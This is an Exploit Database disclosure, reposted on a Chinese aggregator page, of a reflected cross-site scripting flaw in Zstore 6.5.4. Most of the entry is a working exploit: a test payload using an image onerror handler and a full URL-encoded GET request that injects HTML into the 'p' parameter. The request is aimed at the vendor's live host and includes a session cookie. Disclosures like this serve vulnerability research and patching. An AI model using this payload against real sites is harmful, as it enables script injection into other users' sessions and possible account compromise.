Zstore 6.5.4 – Reflected Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： nu11secur1ty
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51207/

• ## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) 
  ## Development: nu11secur1ty
  ## Date: 01.18.2023
  ## Vendor: https://zippy.com.ua/
  ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
  ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
  
  ## Description:
  The value of manual insertion point 1 is copied into the HTML document
  as plain text between tags.
  The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
  the manual insertion point 1.
  This input was echoed unmodified in the application's response.
  
  
  ## STATUS: HIGH Vulnerability
  
  [+] Exploit:
  ```GET
  GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
  HTTP/2
  Host: store.zippy.com.ua
  Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
  Cache-Control: max-age=0
  Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
  Sec-Ch-Ua-Mobile: ?0
  Sec-Ch-Ua-Platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
  Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  ```
  
  ## Proof and Exploit:
  [href](https://streamable.com/tplz84)
  
  ## Reference:
  [href](https://portswigger.net/web-security/cross-site-scripting/reflected)
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>